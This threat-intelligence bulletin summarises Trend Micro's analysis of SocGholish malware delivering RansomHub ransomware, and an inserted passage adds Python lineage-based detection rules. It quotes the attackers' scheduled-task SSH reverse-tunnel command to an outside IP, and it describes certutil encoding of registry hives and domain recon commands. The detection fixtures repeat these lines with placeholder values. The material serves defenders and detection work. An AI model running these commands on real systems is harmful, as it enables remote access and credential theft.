2025-03-27

SocGholish Malware Identified as Key Enabler of RansomHub Ransomware Attacks

Level: Tactical | Source: Trend Micro | Global


Trend Micro researchers have identified an escalating threat in which the SocGholish malware framework is paired with RansomHub ransomware, forming an intrusion set tracked as Water Scylla. The surge in activity is evident in Trend Micro's telemetry, which shows increased SocGholish detections in 2025, with the United States experiencing the highest infection rates, particularly within government organizations. The malware is distributed through multiple vectors, including compromised websites, rogue Keitaro Traffic Distribution System (TDS) instances, fake browser update pages, and malicious ZIP files. SocGholish’s infrastructure is extensive, with over a thousand compromised websites redirecting traffic to malicious domains. Trend Micro warns that "SocGholish’s key role in enabling initial access for ransomware warrants the attention of defenders to thwart attacks," as its backdoors grant persistent access to infected systems. RansomHub’s infrastructure further compounds the threat, with Trend Micro identifying "22 IP addresses across a diverse range of Autonomous Systems (ASNs), predominantly located in the US, with just two located in the Netherlands and Germany, respectively."

Analysis of the SocGholish infection chain shows that execution begins with a malicious JavaScript file run via Windows Script Host (wscript.exe), which subsequently spawns cmd.exe and PowerShell processes. Initial tasks focus on reconnaissance, with the malware pursuing five primary objectives: system discovery, credential harvesting, exfiltration, backdoor deployment, and reverse shell establishment. PowerShell commands leverage Active Directory Service Interfaces (ADSI), net commands, and nltest to enumerate domain users, system configurations, and network shares. The attack then escalates with Python execution, including the installation of dependencies and the creation of an SSH tunnel. Notably, a hardcoded command-and-control (C2) address linked to RansomHub is embedded in the payload. For credential theft, Trend Micro observed various activities, including the use of "certutil.exe --encode" to encode and extract critical registry hives, such as SAM, SECURITY, and SYSTEM, as well as the capture of stored browser credentials.

Persistence mechanisms include the creation of scheduled tasks, with a notable example deploying an SSH reverse shell: "SCHTASKS /create /tn 'Update' /tr 'ssh.exe -R 2525 -p 443 -o StrictHostKeyChecking=no cvhjkluytrdcvjytfasdv@5.61.39[.]26' /sc minute /mo 5." Attackers exhibit hands-on-keyboard activity, evident from observed syntax errors such as "net use <username> /domain." Correctly formed reconnaissance commands issued during the attack include "systeminfo," "ipconfig /all," and "net use." Targeted efforts were made to locate credentials through a string search for "pass." Lastly, the NirCMD utility was downloaded and executed, allowing attackers to capture screenshots and exfiltrate them to C2 servers. SMB protocol abuse was observed, where a batch file was deployed via scheduled tasks for further credential extraction and lateral movement. Although the artifacts were later deleted, Trend Micro's forensic analysis indicates ongoing attempts to harvest credentials from browser stores and encrypted vaults: "Although the file is unavailable, the telemetry available on the host indicates the batch file appears to be attempting to extract encrypted keys from local state files associated with Microsoft Edge and Google Chrome browsers and save the results in the %PROGRAMDATA% folder as a *.log file."
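A defender-side illustration of the chain described above: an added example (not from the Trend Micro report or from Anvilogic) that runs process-lineage rules over constructed Sysmon-style process-creation events to flag a script host spawning a shell, recon tools descended from wscript.exe, an ssh -R scheduled task, and certutil encoding of registry hive names. All events, PIDs, paths and the 203.0.113.10 placeholder address are assumptions made for the example.

```python
import re

# Constructed Sysmon Event ID 1-style process events: (pid, ppid, image, command line).
# Every value is made up for this example; 203.0.113.10 is a documentation placeholder.
SAMPLE_EVENTS = [
    (100, 1,   "explorer.exe",   "explorer.exe"),
    (200, 100, "wscript.exe",    r"wscript.exe C:\Users\bob\Downloads\Update.js"),
    (300, 200, "cmd.exe",        r"cmd.exe /c powershell.exe -File C:\Temp\r.ps1"),
    (400, 300, "powershell.exe", r"powershell.exe -File C:\Temp\r.ps1"),
    (500, 400, "nltest.exe",     "nltest /dclist:"),
    (600, 400, "schtasks.exe",   'SCHTASKS /create /tn Update /tr "ssh.exe -R 2525 -p 443 '
                                 '-o StrictHostKeyChecking=no u@203.0.113.10" /sc minute /mo 5'),
    (700, 400, "certutil.exe",   r"certutil.exe --encode C:\Temp\SAM C:\Temp\sam.txt"),
    (800, 100, "cmd.exe",        "cmd.exe"),
    (900, 800, "nltest.exe",     "nltest /dclist:"),  # admin at a console: same tool, no wscript ancestor
    (950, 1,   "schtasks.exe",   "schtasks /create /tn Backup /tr backup.exe /sc daily"),
]

RECON_TOOLS = {"nltest.exe", "net.exe", "net1.exe", "systeminfo.exe", "ipconfig.exe"}
SSH_REVERSE_RE = re.compile(r"\bssh(?:\.exe)?\b.*\s-R\s", re.I)  # ssh remote port forward
ENCODE_RE = re.compile(r"\s--?encode\b", re.I)                   # certutil -encode (report quotes --encode)
HIVE_RE = re.compile(r"\b(?:sam|security|system)\b", re.I)       # registry hive names on the command line

def build_tree(events):
    """Map pid -> (ppid, lower-cased image basename, command line)."""
    return {pid: (ppid, image.rsplit("\\", 1)[-1].lower(), cmd) for pid, ppid, image, cmd in events}

def ancestry(tree, pid):
    """Image names of pid's ancestors, nearest parent first; the seen set guards against pid reuse loops."""
    names, seen, ppid = [], set(), tree[pid][0]
    while ppid in tree and ppid not in seen:
        seen.add(ppid)
        names.append(tree[ppid][1])
        ppid = tree[ppid][0]
    return names

def detect(events):
    """Return (rule, pid) findings for the SocGholish behaviours described in the report."""
    tree, findings = build_tree(events), []
    for pid, (_, image, cmd) in tree.items():
        anc = ancestry(tree, pid)
        if anc[:1] == ["wscript.exe"] and image in {"cmd.exe", "powershell.exe"}:
            findings.append(("wscript_spawns_shell", pid))           # script host launching a shell
        if image in RECON_TOOLS and "wscript.exe" in anc:
            findings.append(("recon_under_wscript", pid))            # AD/host recon descended from wscript
        if image == "schtasks.exe" and "/create" in cmd.lower() and SSH_REVERSE_RE.search(cmd):
            findings.append(("schtasks_ssh_reverse_tunnel", pid))   # persistence via an ssh -R task
        if image == "certutil.exe" and ENCODE_RE.search(cmd) and HIVE_RE.search(cmd):
            findings.append(("certutil_encode_registry_hive", pid)) # hive staging before exfiltration
    return findings
```

The lineage check is what separates pid 500 from pid 900: the same nltest command is only flagged when a wscript.exe ancestor exists, which keeps routine administrator use out of the alert.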

Trend Micro’s investigation of SocGholish infrastructure reveals 18 active C2 servers, with domains rotating weekly to evade detection. The malware operators use domain shadowing, leveraging compromised legitimate domains to disguise malicious activity. RansomHub’s infrastructure remains a critical concern, as its affiliates rely on SocGholish infections for ransomware deployment.
